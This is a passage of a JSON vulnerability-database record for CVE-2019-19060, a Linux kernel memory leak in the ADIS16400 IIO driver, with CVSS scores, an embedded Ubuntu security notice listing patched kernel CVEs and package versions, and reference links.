            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-151469",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2019-19060",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2019-19060",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201911-1081",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-151469",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2019-19060",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-151469"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-19060"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011971"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19060"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1081"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A memory leak in the adis_update_scan_mode() function in drivers/iio/imu/adis_buffer.c in the Linux kernel before 5.3.9 allows attackers to cause a denial of service (memory consumption), aka CID-ab612b1daf41. Linux Kernel Contains a resource exhaustion vulnerability. Vendors have confirmed this vulnerability CID-ab612b1daf41 It is released as.Service operation interruption (DoS) There is a possibility of being put into a state. =========================================================================\nUbuntu Security Notice USN-4226-1\nJanuary 07, 2020\n\nlinux, linux-aws, linux-aws-5.0, linux-azure, linux-gcp, linux-gke-5.0,\nlinux-kvm, linux-oem-osp1, linux-oracle, linux-oracle-5.0, linux-raspi2\nvulnerabilities\n=========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 19.04\n- Ubuntu 18.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux: Linux kernel\n- linux-aws: Linux kernel for Amazon Web Services (AWS) systems\n- linux-azure: Linux kernel for Microsoft Azure Cloud systems\n- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems\n- linux-kvm: Linux kernel for cloud environments\n- linux-oracle: Linux kernel for Oracle Cloud systems\n- linux-raspi2: Linux kernel for Raspberry Pi 2\n- linux-aws-5.0: Linux kernel for Amazon Web Services (AWS) systems\n- linux-gke-5.0: Linux kernel for Google Container Engine (GKE) systems\n- linux-oem-osp1: Linux kernel for OEM processors\n- linux-oracle-5.0: Linux kernel for Oracle Cloud systems\n\nDetails:\n\nMichael Hanselmann discovered that the CIFS implementation in the Linux\nkernel did not sanitize paths returned by an SMB server. An attacker\ncontrolling an SMB server could use this to overwrite arbitrary files. \n(CVE-2019-10220)\n\nIt was discovered that a heap-based buffer overflow existed in the Marvell\nWiFi-Ex Driver for the Linux kernel. A physically proximate attacker could\nuse this to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2019-14895, CVE-2019-14901)\n\nIt was discovered that a heap-based buffer overflow existed in the Marvell\nLibertas WLAN Driver for the Linux kernel. A physically proximate attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2019-14896, CVE-2019-14897)\n\nIt was discovered that the Fujitsu ES network device driver for the Linux\nkernel did not properly check for errors in some situations, leading to a\nNULL pointer dereference. A local attacker could use this to cause a denial\nof service. (CVE-2019-16231)\n\nIt was discovered that the QLogic Fibre Channel driver in the Linux kernel\ndid not properly check for error, leading to a NULL pointer dereference. A\nlocal attacker could possibly use this to cause a denial of service (system\ncrash). (CVE-2019-16233)\n\nNicolas Waisman discovered that the WiFi driver stack in the Linux kernel\ndid not properly validate SSID lengths. A physically proximate attacker\ncould use this to cause a denial of service (system crash). \n(CVE-2019-17133)\n\nAnthony Steinhauser discovered that the Linux kernel did not properly\nperform Spectre_RSB mitigations to all processors for PowerPC architecture\nsystems in some situations. A local attacker could use this to expose\nsensitive information. (CVE-2019-18660)\n\nIt was discovered that the Mellanox Technologies Innova driver in the Linux\nkernel did not properly deallocate memory in certain failure conditions. (CVE-2019-19045)\n\nIt was discovered that the VirtualBox guest driver implementation in the\nLinux kernel did not properly deallocate memory in certain error\nconditions. (CVE-2019-19048)\n\nIt was discovered that Geschwister Schneider USB CAN interface driver in\nthe Linux kernel did not properly deallocate memory in certain failure\nconditions. (CVE-2019-19052)\n\nIt was discovered that the netlink-based 802.11 configuration interface in\nthe Linux kernel did not deallocate memory in certain error conditions. (CVE-2019-19055)\n\nIt was discovered that the ADIS16400 IIO IMU Driver for the Linux kernel\ndid not properly deallocate memory in certain error conditions. \n(CVE-2019-19060)\n\nIt was discovered that the Intel OPA Gen1 Infiniband Driver for the Linux\nkernel did not properly deallocate memory in certain error conditions. (CVE-2019-19065)\n\nIt was discovered that the AMD Audio CoProcessor Driver for the Linux\nkernel did not properly deallocate memory in certain error conditions. (CVE-2019-19067)\n\nIt was discovered that the event tracing subsystem of the Linux kernel did\nnot properly deallocate memory in certain error conditions. (CVE-2019-19072)\n\nIt was discovered that the Cascoda CA8210 SPI 802.15.4 wireless controller\ndriver for the Linux kernel did not properly deallocate memory in certain\nerror conditions. (CVE-2019-19075)\n\nIt was discovered that the AMD Display Engine Driver in the Linux kernel\ndid not properly deallocate memory in certain error conditions. A\nphysically proximate attacker could possibly use this to cause a denial of\nservice (system crash) or execute arbitrary code. (CVE-2019-19524)\n\nIt was discovered that the NXP PN533 NFC USB driver in the Linux kernel did\nnot properly free resources after a late probe error, leading to a use-\nafter-free vulnerability. A physically proximate attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2019-19526)\n\nIt was discovered that the Microchip CAN BUS Analyzer driver in the Linux\nkernel contained a use-after-free vulnerability on device disconnect. A\nphysically proximate attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-19529)\n\nIt was discovered that multiple USB HID device drivers in the Linux kernel\ndid not properly validate device metadata on attachment, leading to out-of-\nbounds writes. A physically proximate attacker could use this to cause a\ndenial of service (system crash) or possibly execute arbitrary code. \n(CVE-2019-19532)\n\nIt was discovered that the PEAK-System Technik USB driver in the Linux\nkernel did not properly sanitize memory before sending it to the device. A\nphysically proximate attacker could use this to expose sensitive\ninformation (kernel memory). (CVE-2019-19534)\n\nIt was discovered that in some situations the fair scheduler in the Linux\nkernel did not permit a process to use its full quota time slice. A local\nattacker could use this to cause a denial of service. (CVE-2019-19922)\n\nIt was discovered that the binder IPC implementation in the Linux kernel\ndid not properly perform bounds checking in some situations, leading to an\nout-of-bounds write. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. (CVE-2019-2214)\n\nNicolas Waisman discovered that the Chelsio T4/T5 RDMA Driver for the Linux\nkernel performed DMA from a kernel stack. A local attacker could use this\nto cause a denial of service (system crash). (CVE-2019-17075)\n\nIt was discovered that the DesignWare USB3 controller driver in the Linux\nkernel did not properly deallocate memory in some error conditions. (CVE-2019-18813)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 19.04:\n  linux-image-5.0.0-1009-oracle   5.0.0-1009.14\n  linux-image-5.0.0-1023-aws      5.0.0-1023.26\n  linux-image-5.0.0-1024-kvm      5.0.0-1024.26\n  linux-image-5.0.0-1024-raspi2   5.0.0-1024.25\n  linux-image-5.0.0-1028-azure    5.0.0-1028.30\n  linux-image-5.0.0-1028-gcp      5.0.0-1028.29\n  linux-image-5.0.0-38-generic    5.0.0-38.41\n  linux-image-5.0.0-38-generic-lpae  5.0.0-38.41\n  linux-image-5.0.0-38-lowlatency  5.0.0-38.41\n  linux-image-aws                 5.0.0.1023.25\n  linux-image-azure               5.0.0.1028.28\n  linux-image-gcp                 5.0.0.1028.53\n  linux-image-generic             5.0.0.38.40\n  linux-image-generic-lpae        5.0.0.38.40\n  linux-image-gke                 5.0.0.1028.53\n  linux-image-kvm                 5.0.0.1024.25\n  linux-image-lowlatency          5.0.0.38.40\n  linux-image-oracle              5.0.0.1009.35\n  linux-image-raspi2              5.0.0.1024.22\n  linux-image-virtual             5.0.0.38.40\n\nUbuntu 18.04 LTS:\n  linux-image-5.0.0-1009-oracle   5.0.0-1009.14~18.04.1\n  linux-image-5.0.0-1023-aws      5.0.0-1023.26~18.04.1\n  linux-image-5.0.0-1027-gke      5.0.0-1027.28~18.04.1\n  linux-image-5.0.0-1028-azure    5.0.0-1028.30~18.04.1\n  linux-image-5.0.0-1033-oem-osp1  5.0.0-1033.38\n  linux-image-aws-edge            5.0.0.1023.37\n  linux-image-azure               5.0.0.1028.39\n  linux-image-gke-5.0             5.0.0.1027.16\n  linux-image-oem-osp1            5.0.0.1033.37\n  linux-image-oracle-edge         5.0.0.1009.8\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n  https://usn.ubuntu.com/4226-1\n  CVE-2019-10220, CVE-2019-14895, CVE-2019-14896, CVE-2019-14897,\n  CVE-2019-14901, CVE-2019-16231, CVE-2019-16233, CVE-2019-17075,\n  CVE-2019-17133, CVE-2019-18660, CVE-2019-18813, CVE-2019-19045,\n  CVE-2019-19048, CVE-2019-19052, CVE-2019-19055, CVE-2019-19060,\n  CVE-2019-19065, CVE-2019-19067, CVE-2019-19072, CVE-2019-19075,\n  CVE-2019-19083, CVE-2019-19524, CVE-2019-19526, CVE-2019-19529,\n  CVE-2019-19532, CVE-2019-19534, CVE-2019-19922, CVE-2019-2214\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/linux/5.0.0-38.41\n  https://launchpad.net/ubuntu/+source/linux-aws/5.0.0-1023.26\n  https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1028.30\n  https://launchpad.net/ubuntu/+source/linux-gcp/5.0.0-1028.29\n  https://launchpad.net/ubuntu/+source/linux-kvm/5.0.0-1024.26\n  https://launchpad.net/ubuntu/+source/linux-oracle/5.0.0-1009.14\n  https://launchpad.net/ubuntu/+source/linux-raspi2/5.0.0-1024.25\n  https://launchpad.net/ubuntu/+source/linux-aws-5.0/5.0.0-1023.26~18.04.1\n  https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1028.30~18.04.1\n  https://launchpad.net/ubuntu/+source/linux-gke-5.0/5.0.0-1027.28~18.04.1\n  https://launchpad.net/ubuntu/+source/linux-oem-osp1/5.0.0-1033.38\n  https://launchpad.net/ubuntu/+source/linux-oracle-5.0/5.0.0-1009.14~18.04.1\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-19060"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011971"
      },
      {
        "db": "VULHUB",
        "id": "VHN-151469"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-19060"
      },
      {
        "db": "PACKETSTORM",
        "id": "155529"
      },
      {
        "db": "PACKETSTORM",
        "id": "155854"
      },
      {
        "db": "PACKETSTORM",
        "id": "157755"
      }
    ],
    "trust": 2.07
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-19060",
        "trust": 2.9
      },
      {
        "db": "PACKETSTORM",
        "id": "157755",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011971",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1081",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "155529",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "155854",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0851",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4793",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4539",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4346.2",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4704",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.1768.2",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0830",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0141",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4584",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-151469",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-19060",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-151469"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-19060"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011971"
      },
      {
        "db": "PACKETSTORM",
        "id": "155529"
      },
      {
        "db": "PACKETSTORM",
        "id": "155854"
      },
      {
        "db": "PACKETSTORM",
        "id": "157755"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19060"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1081"
      }
    ]
  },
  "id": "VAR-201911-1413",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-151469"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T11:01:20.127000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "ChangeLog-5.3.9",
        "trust": 0.8,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/changelog-5.3.9"
      },
      {
        "title": "iio: imu: adis16400: release allocated memory on failure",
        "trust": 0.8,
        "url": "https://github.com/torvalds/linux/commit/ab612b1daf415b62c58e130cb3d0f30b255a14d0"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org"
      },
      {
        "title": "Linux kernel Remediation of resource management error vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=103001"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-aws-hwe, linux-gcp, linux-gke-4.15, linux-hwe, linux-kvm, linux-oem, linux-oracle, linux-raspi2, linux-snapdragon vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4210-1"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-lts-xenial, linux-raspi2, linux-snapdragon vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4364-1"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-gcp, linux-gcp-5.3, linux-kvm, linux-oracle vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4208-1"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-aws-5.0, linux-azure, linux-gcp, linux-gke-5.0, linux-kvm, linux-oem-osp1, linux-oracle, linux-oracle-5.0, linux-raspi2 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4226-1"
      },
      {
        "title": "Amazon Linux 2: ALAS2-2021-1627",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2-2021-1627"
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2019-19060 "
      },
      {
        "title": "cve_diff_checker",
        "trust": 0.1,
        "url": "https://github.com/lcatro/cve_diff_checker "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-19060"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011971"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1081"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-401",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-400",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-151469"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011971"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19060"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "https://usn.ubuntu.com/4210-1/"
      },
      {
        "trust": 1.8,
        "url": "https://security.netapp.com/advisory/ntap-20191205-0001/"
      },
      {
        "trust": 1.8,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/changelog-5.3.9"
      },
      {
        "trust": 1.8,
        "url": "https://github.com/torvalds/linux/commit/ab612b1daf415b62c58e130cb3d0f30b255a14d0"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00029.html"
      },
      {
        "trust": 1.8,
        "url": "https://usn.ubuntu.com/4208-1/"
      },
      {
        "trust": 1.8,
        "url": "https://usn.ubuntu.com/4226-1/"
      },
      {
        "trust": 1.8,
        "url": "https://usn.ubuntu.com/4364-1/"
      },
      {
        "trust": 1.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19060"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-19060"
      },
      {
        "trust": 0.6,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00237.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193200-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193381-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2020/suse-su-20200093-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193316-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193317-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.1768.2/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4539/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4704/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/157755/ubuntu-security-notice-usn-4364-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/155529/ubuntu-security-notice-usn-4210-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4793/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0851/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4584/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0830/"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2019-19060"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0141/"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-five-vulnerabilities-via-memory-leak-30908"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/155854/ubuntu-security-notice-usn-4226-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4346.2/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19065"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17075"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17133"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19075"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/401.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2019-19060"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1051.51"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16746"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-4.15/4.15.0-1049.52"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oem/4.15.0-1065.75"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1050.53"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-hwe/4.15.0-1056.58~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1030.33~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1069.76"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1052.56"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4210-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1030.33"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1056.58"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/4.15.0-72.81~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-72.81"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1028.30"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1028.30~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19048"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/5.0.0-1024.25"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16231"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.0.0-1024.26"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.0/5.0.0-1009.14~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16233"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18813"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18660"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.0.0-1028.29"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19052"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.0.0-1023.26"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10220"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19067"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19045"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-2214"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19526"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4226-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-5.0/5.0.0-1027.28~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19922"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14901"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.0.0-38.41"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19524"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19083"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19529"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19072"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oem-osp1/5.0.0-1033.38"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.0.0-1009.14"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19055"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19534"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19532"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-5.0/5.0.0-1023.26~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.4.0-179.209"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-11668"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.4.0-1107.118"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-11565"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-11608"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-11494"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-11609"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.4.0-1133.142"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4364-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.4.0-1137.145"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10942"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-151469"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-19060"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011971"
      },
      {
        "db": "PACKETSTORM",
        "id": "155529"
      },
      {
        "db": "PACKETSTORM",
        "id": "155854"
      },
      {
        "db": "PACKETSTORM",
        "id": "157755"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19060"
      },
      {
